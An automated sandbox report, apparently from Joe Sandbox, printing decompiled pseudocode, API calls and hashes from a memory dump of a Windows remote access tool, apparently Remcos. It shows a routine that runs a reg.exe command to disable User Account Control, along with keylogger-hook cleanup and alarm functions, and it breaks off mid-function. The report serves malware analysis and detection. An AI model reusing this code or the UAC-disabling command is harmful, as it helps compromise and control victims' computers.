				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t20 == 0) {
					GetLastError();
					goto L3;
				}
				return _t20;
			}








                    0x0041be2c
                    0x0041be36
                    0x0041be40
                    0x0041be46
                    0x0041be50
                    0x0041be53
                    0x0041be54
                    0x0041be5b
                    0x0041be5e
                    0x0041be5f
                    0x0041be62
                    0x0041be63
                    0x0041be65
                    0x0041be6f
                    0x0041be91
                    0x00000000
                    0x0041be91
                    0x0041be81
                    0x0041be89
                    0x0041be8b
                    0x00000000
                    0x0041be8b
                    0x0041be99

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ClassCreateErrorLastRegisterWindow
                    • String ID: 0$MsgWindowClass
                    • API String ID: 2877667751-2410386613
                    • Opcode ID: 2c2acc564e7228da8453ef1ef4daccb200bb255fb4852b917a0f25144a291afc
                    • Instruction ID: 5840f73649b50f116e6ab49c8ddc39afef87091f1adce936c33ae781c96a4941
                    • Opcode Fuzzy Hash: 2c2acc564e7228da8453ef1ef4daccb200bb255fb4852b917a0f25144a291afc
                    • Instruction Fuzzy Hash: 0A01E9B190031DABDB10DF95ECC49EFBBBCEB08355F40057AF914A6240E77599058BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406DC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00406DC9() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v92;
				void* __edi;
				long _t18;

				_t18 = 0x44;
				E00435760(0,  &_v92, 0, _t18);
				_v92.cb = _t18;
				E00435760(0,  &_v20, 0, 0x10);
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}







                    0x00406dd3
                    0x00406ddc
                    0x00406de6
                    0x00406deb
                    0x00406e0f
                    0x00406e1e
                    0x00406e2a

                    APIs
                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406E0F
                    • CloseHandle.KERNEL32(?), ref: 00406E1E
                    • CloseHandle.KERNEL32(?), ref: 00406E23
                    Strings
                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00406E05
                    • C:\Windows\System32\cmd.exe, xrefs: 00406E0A
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreateProcess
                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                    • API String ID: 2922976086-4183131282
                    • Opcode ID: 0f52d4b74f975e3f2949df4035c160fbb6b8b2e0bf2a4fef78c5a914e70af107
                    • Instruction ID: 771504d0c5622b635381120a699b2d9c6d8516bd8efb25c1479c62c52dadb0bd
                    • Opcode Fuzzy Hash: 0f52d4b74f975e3f2949df4035c160fbb6b8b2e0bf2a4fef78c5a914e70af107
                    • Instruction Fuzzy Hash: 1DF09676D0029C76CB20ABD7AC0EFDF7F3CEBC5B11F04016AB508A2041D6705010CAB5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00441C0A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00441BBB,?,?,00441B5B,?), ref: 00441C2A
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00441C3D
                    • FreeLibrary.KERNEL32(00000000,?,?,?,00441BBB,?,?,00441B5B,?), ref: 00441C60
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: ea4ab4854586bb172daf74edb897d215f2c8ee4f05ba98cc7202b459c056c010
                    • Instruction ID: 8f9b3e7d5fe4f03b554215b975d8d256f1185f74086fc6d013083e353006690b
                    • Opcode Fuzzy Hash: ea4ab4854586bb172daf74edb897d215f2c8ee4f05ba98cc7202b459c056c010
                    • Instruction Fuzzy Hash: 79F06830944318FBDB115F54EC49B9EBFB8EF04756F004175FC05A2261DB788E84CA98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E004050C4(void* __ecx, void* __ebp, char _a4) {
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t25;

				_t23 = __ecx;
				if( *((char*)(__ecx + 0x5c)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t26 = _t25 - 0x18;
					E00402073(_t17, _t25 - 0x18, _t21, __ebp, "KeepAlive             | Disabled");
					E00402073(_t17, _t26 - 0x18, _t21, __ebp, "!");
					E0041A04A(_t17, _t22);
				}
				 *(_t23 + 0x64) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t23 + 0x60));
				WaitForSingleObject( *(_t23 + 0x64), 0xffffffff);
				CloseHandle( *(_t23 + 0x64));
				return 1;
			}








                    0x004050c5
                    0x004050cb
                    0x00000000
                    0x0040512a
                    0x004050d2
                    0x004050d4
                    0x004050de
                    0x004050ed
                    0x004050f2
                    0x004050f7
                    0x00405109
                    0x0040510c
                    0x00405117
                    0x00405120
                    0x00000000

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405100
                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 0040510C
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405117
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405120
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                    • String ID: KeepAlive | Disabled
                    • API String ID: 2993684571-305739064
                    • Opcode ID: 54ac682c0df13f07fbc8928149592847e25effe2883c6d2c4aa9bc08f146cb61
                    • Instruction ID: 9fcb7412de1a371383c4be032709771db6bfe23be82c7c78edeb32f54ebeba58
                    • Opcode Fuzzy Hash: 54ac682c0df13f07fbc8928149592847e25effe2883c6d2c4aa9bc08f146cb61
                    • Instruction Fuzzy Hash: E8F096719087107FDB103774AD0AA6F7E98AB16315F00057FF986516E2D5B888509B9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041991B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E0041991B(WCHAR* __ecx) {
				void* __edi;
				void* _t7;
				void* _t11;
				void* _t12;
				WCHAR* _t14;
				void* _t16;
				void* _t17;

				_t18 = _t17 - 0x18;
				_t14 = __ecx;
				E00402073(_t7, _t17 - 0x18, _t11, _t16, "Alarm triggered");
				E00402073(_t7, _t18 - 0x18, _t11, _t16, "!");
				E0041A04A(_t7, _t12);
				PlaySoundW(_t14, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}










                    0x0041991d
                    0x00419920
                    0x00419929
                    0x00419938
                    0x0041993d
                    0x0041995b
                    0x00419962
                    0x0041996f

                    APIs
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041994D
                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041995B
                    • Sleep.KERNEL32(00002710), ref: 00419962
                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041996B
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: PlaySound$HandleLocalModuleSleepTime
                    • String ID: Alarm triggered
                    • API String ID: 614609389-2816303416
                    • Opcode ID: 13be5a314f47b5be99a2dc760bbc57afffc3dda2b1f88ff1863d5b7f6b116ace
                    • Instruction ID: 8069d90e893f75e5c908224cd3dcb2ae2e93304f9117e242fbfb21d481eb26c4
                    • Opcode Fuzzy Hash: 13be5a314f47b5be99a2dc760bbc57afffc3dda2b1f88ff1863d5b7f6b116ace
                    • Instruction Fuzzy Hash: 0CE01A26A4822037A510336BBD0FD6F2D29DAC7B62B0101BFFA05661E29D98085196FB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041B663 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                    Download Yara Rule
                    C-Code - Quality: 54%
                    			E0041B663() {
				struct _CONSOLE_SCREEN_BUFFER_INFO _v28;
				void* _t9;
				void* _t12;

				_t9 = GetStdHandle(0xfffffff5);
				GetConsoleScreenBufferInfo(_t9,  &_v28);
				SetConsoleTextAttribute(_t9, 0xc);
				_push("\n\t ______                              \n\t(_____ \\                             \n\t _____) )_____ ____   ____ ___   ___ \n\t|  __  /| ___ |    \\ / ___) _ \\ /___)\n\t| |  \\ \\| ____| | | ( (__| |_| |___ |\n\t|_|   |_|_____)_|_|_|\\____)___/(___/ \n");
				E00406874(_t12);
				return SetConsoleTextAttribute(_t9, _v28.wAttributes & 0x0000ffff);
			}






                    0x0041b673
                    0x0041b67a
                    0x0041b687
                    0x0041b68d
                    0x0041b692
                    0x0041b6a5

                    APIs
                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041B6F8), ref: 0041B66D
                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041B6F8), ref: 0041B67A
                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041B6F8), ref: 0041B687
                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041B6F8), ref: 0041B69A
                    Strings
                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041B68D
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                    • API String ID: 3024135584-2418719853
                    • Opcode ID: b5101502732423ef893627347f2af24e4f93fc0e171d4abeb9243736e4473fa4
                    • Instruction ID: ad478a08908ae1e8722594817e35ebd278399d2ab3723c686487d6c51551703d
                    • Opcode Fuzzy Hash: b5101502732423ef893627347f2af24e4f93fc0e171d4abeb9243736e4473fa4
                    • Instruction Fuzzy Hash: D0E04F62648708ABD3103FB6BC4EC6F7B7DE785623F101636FA1291293E974841086B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040AE1C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 18threadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E0040AE1C() {
				signed int _t15;

				 *0x473089 = 0;
				TerminateThread(E00409880, 0);
				if( *0x473040 != 0) {
					__eax = UnhookWindowsHookEx(__eax);
					 *0x473040 = 0;
					__eax = TerminateThread(E0040986A, 0);
				}
				_pop(0);
				_push(0);
				_t25 = DeleteFileW(E00401EE4(0x4730a0));
				_t15 = 0 | DeleteFileW(E00401EE4(0x4730a0)) != 0x00000000;
				if(E00406E2B(_t25) != 0) {
					RemoveDirectoryW(E00401EE4(0x4730b8));
				}
				return _t15;
			}




                    0x0040ae25
                    0x0040ae2b
                    0x0040ae38
                    0x0040ae3b
                    0x0040ae47
                    0x0040ae4d
                    0x0040ae4d
                    0x0040ae58
                    0x0040addf
                    0x0040adf2
                    0x0040adfc
                    0x0040ae06
                    0x0040ae11
                    0x0040ae11
                    0x0040ae1b

                    APIs
                    • TerminateThread.KERNEL32(00409880,00000000,pth_unenc,0040C5C1,00473220,00473238,?,pth_unenc), ref: 0040AE2B
                    • UnhookWindowsHookEx.USER32(?), ref: 0040AE3B
                    • TerminateThread.KERNEL32(0040986A,00000000,?,pth_unenc), ref: 0040AE4D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: TerminateThread$HookUnhookWindows
                    • String ID: @0G$pth_unenc
                    • API String ID: 3123878439-155138683
                    • Opcode ID: 115079c2282a6bf9576d9e0b7d13f6b7bc05c6b49fdad65596f4409ad05b5654
                    • Instruction ID: e1e5eea1f7390eadd48dce0aa84519ec7b6f9c8f196e89bb690cf3ca84e6fe29
                    • Opcode Fuzzy Hash: 115079c2282a6bf9576d9e0b7d13f6b7bc05c6b49fdad65596f4409ad05b5654
                    • Instruction Fuzzy Hash: 81E0EC616553809FD7106F60BC98A62775AB606B47310807AF506A62A6C73C8E44A6AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0043FC6A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E0043FC6A(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				void* _t106;
				intOrPtr _t108;
				intOrPtr _t109;
				int _t110;
				short* _t113;
				int _t114;
				int _t116;
				signed int _t117;

				_t106 = __edx;
				_t59 =  *0x46f00c; // 0x54ba778e
				_v8 = _t59 ^ _t117;
				_t61 = _a4;
				_t91 = _a12;
				_t116 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t113 = _a8;
				_v24 = _t113;
				if(_t61 == 0 || _t91 != 0) {
					if(_t113 != 0) {
						E004390B7(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
								if(_t64 == 0 || _v20 != _t116) {
									L55:
									_t65 = E0043EEAD();
									_t114 = _t113 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t114 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t113 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t114 = _t116;
								goto L56;
							}
							while(_t68 <= 0xff) {
								_t113 =  &(_t113[1]);
								_t116 = _t116 + 1;
								_t68 =  *_t113 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t108 = _v44;
						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
							if( *((intOrPtr*)(_t108 + 4)) != 1) {
								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
								if(_t114 == 0) {
									if(_v20 != _t116 || GetLastError() != 0x7a) {
										L45:
										_t71 = E0043EEAD();
										_t116 = _t116 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t109 = _v44;
											_t103 =  *(_t109 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
											_t93 = _a12;
											_t110 = _t74;
											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
												goto L55;
											}
											if(_t110 + _t114 > _t93) {
												goto L56;
											}
											_t76 = _t116;
											_v32 = _t76;
											if(_t110 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t114 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
												 *((char*)(_t105 + _t114)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t114 = _t114 + 1;
												_v32 = _t76;
												if(_t76 < _t110) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t116) {
									goto L45;
								}
								_t28 = _t114 - 1; // -1
								_t116 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
								if(_t116 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t116 - 1] == 0) {
										_t116 = _t116 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t113;
							_v24 = _t91;
							while( *_t83 != _t116) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t116 &&  *_t83 == _t116) {
								_t91 = (_t83 - _t113 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						while( *_t113 <= 0xff) {
							_t98[_t116] =  *_t113;
							_t85 =  *_t113;
							_t113 =  &(_t113[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t116 = _t116 + 1;
							if(_t116 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E0043EEAD())) = 0x16;
					E0043A5BB();
					goto L59;
				} else {
					L59:
					return E004338BB(_v8 ^ _t117);
				}
			}






































                    0x0043fc6a
                    0x0043fc72
                    0x0043fc79
                    0x0043fc7c
                    0x0043fc80
                    0x0043fc84
                    0x0043fc86
                    0x0043fc89
                    0x0043fc8d
                    0x0043fc90
                    0x0043fc95
                    0x0043fca4
                    0x0043fcc4
                    0x0043fcc9
                    0x0043fcce
                    0x0043fe6b
                    0x0043fe74
                    0x0043fea6
                    0x0043feae
                    0x0043feba
                    0x0043feba
                    0x0043febf
                    0x0043fec2
                    0x00000000
                    0x0043feb5
                    0x0043feb5
                    0x0043feb5
                    0x0043fec8
                    0x0043fecc
                    0x0043fed1
                    0x0043fed1
                    0x00000000
                    0x0043fed8
                    0x0043feae
                    0x0043fe76
                    0x0043fe7c
                    0x0043fe94
                    0x0043fe94
                    0x00000000
                    0x0043fe94
                    0x0043fe83
                    0x0043fe88
                    0x0043fe8b
                    0x0043fe8c
                    0x0043fe92
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043fe92
                    0x00000000
                    0x0043fe83
                    0x0043fcd4
                    0x0043fcdd
                    0x0043fd17
                    0x0043fd90
                    0x0043fd94
                    0x0043fdaa
                    0x0043fe5b
                    0x0043fe5b
                    0x0043fe60
                    0x0043fe63
                    0x00000000
                    0x0043fdbf
                    0x0043fdc1
                    0x00000000
                    0x00000000
                    0x0043fdc7
                    0x0043fdca
                    0x0043fdca
                    0x0043fdcd
                    0x0043fdd3
                    0x0043fdd7
                    0x0043fdd7
                    0x0043fde9
                    0x0043fdef
                    0x0043fdf2
                    0x0043fdf6
                    0x00000000
                    0x00000000
                    0x0043fe1b
                    0x00000000
                    0x00000000
                    0x0043fe21
                    0x0043fe23
                    0x0043fe28
                    0x0043fe48
                    0x0043fe4b
                    0x0043fe4e
                    0x0043fe53
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043fe59
                    0x0043fe2a
                    0x0043fe2d
                    0x0043fe2d
                    0x0043fe31
                    0x0043fe36
                    0x00000000
                    0x00000000
                    0x0043fe3f
                    0x0043fe40
                    0x0043fe41
                    0x0043fe46
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043fe46
                    0x00000000
                    0x0043fe2d
                    0x00000000
                    0x0043fdca
                    0x0043fdaa
                    0x0043fd99
                    0x00000000
                    0x00000000
                    0x0043fd9f
                    0x0043fd9f
                    0x00000000
                    0x0043fd9f
                    0x0043fd1b
                    0x0043fd41
                    0x0043fd54
                    0x0043fd58
                    0x00000000
                    0x0043fd68
                    0x0043fd70
                    0x0043fd76
                    0x0043fd76
                    0x00000000
                    0x0043fd70
                    0x0043fd58
                    0x0043fd1d
                    0x0043fd1f
                    0x0043fd22
                    0x0043fd27
                    0x0043fd2a
                    0x0043fd2a
                    0x0043fd2e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043fd2e
                    0x0043fd33
                    0x0043fd40
                    0x0043fd40
                    0x00000000
                    0x0043fd33
                    0x0043fce1
                    0x00000000
                    0x00000000
                    0x0043fcec
                    0x0043fcf7
                    0x0043fcfa
                    0x0043fcfd
                    0x0043fd03
                    0x00000000
                    0x00000000
                    0x0043fd09
                    0x0043fd0c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043fd0e
                    0x00000000
                    0x0043fcec
                    0x0043fcab
                    0x0043fcb1
                    0x00000000
                    0x0043fc9b
                    0x0043feda
                    0x0043feea
                    0x0043feea

                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d077a8b190852e3b7fe11e6cef96461035acd321b12386ca60cae5b871db1d14
                    • Instruction ID: 060016eacbcb527956992f75cf2bc0db82b48ac299cd878c71906e1bf1d9a011
                    • Opcode Fuzzy Hash: d077a8b190852e3b7fe11e6cef96461035acd321b12386ca60cae5b871db1d14
                    • Instruction Fuzzy Hash: 9D71F432D002169BCF218F55C845ABFBB75EF49310F14613BE811672A2D7789D49CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004435FC Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 73%
                    			E004435FC(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				intOrPtr _t293;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t328;
				void* _t330;
				signed int _t332;
				void* _t333;
				intOrPtr _t334;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t343;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				intOrPtr* _t362;
				signed int _t364;
				signed int _t370;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int _t393;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t399;
				signed int* _t403;
				intOrPtr* _t410;
				intOrPtr* _t411;
				signed int _t421;
				short _t422;
				void* _t424;
				signed int _t425;
				signed int _t427;
				intOrPtr _t428;
				signed int _t431;
				intOrPtr _t432;
				signed int _t434;
				signed int _t437;
				intOrPtr _t443;
				signed int _t444;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t456;
				signed int* _t457;
				intOrPtr* _t458;
				short _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				void* _t467;
				void* _t468;
				void* _t470;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				void* _t477;
				void* _t479;
				intOrPtr _t491;

				_t420 = __edx;
				_t461 = _t467;
				_t468 = _t467 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t357 = E00444A38(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t370);
				if(_t357 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t2 = _t357 + 4; // 0x4
					_t427 = _t2;
					 *_t427 = 0;
					 *_t357 = 1;
					_t443 = _a4;
					_t4 = _t443 + 0x30; // 0x442dfb
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x45b570);
					_push( *0x45b42c);
					E0044353B(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
					_t470 = _t468 + 0x18;
					_v8 = 0x45b42c;
					while(1) {
						L2:
						_t244 = E0044E807(_t427, 0x351, ";");
						_t471 = _t470 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t410 = _t8;
							_t339 =  *_v16;
							_v16 = _t410;
							_t411 =  *_t410;
							goto L4;
						}
						while(1) {
							L4:
							_t420 =  *_t339;
							if(_t420 !=  *_t411) {
								break;
							}
							if(_t420 == 0) {
								L8:
								_t340 = 0;
							} else {
								_t420 =  *((intOrPtr*)(_t339 + 2));
								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
									break;
								} else {
									_t339 = _t339 + 4;
									_t411 = _t411 + 4;
									if(_t420 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t370 = _v8 + 0xc;
							_v8 = _t370;
							_v12 = _v12 &  !( ~_t340);
							_t343 = _v16;
							_v16 = _t343;
							_push( *_t343);
							_push(0x45b570);
							_push( *_t370);
							E0044353B(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
							_t470 = _t471 + 0x18;
							if(_v8 < 0x45b45c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E00445002(_t357);
									_t31 = _t443 + 0x28; // 0x30ff068b
									_t434 = _t427 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t443 + 0x28; // 0x30ff068b
											E00445002( *_t32);
										}
									}
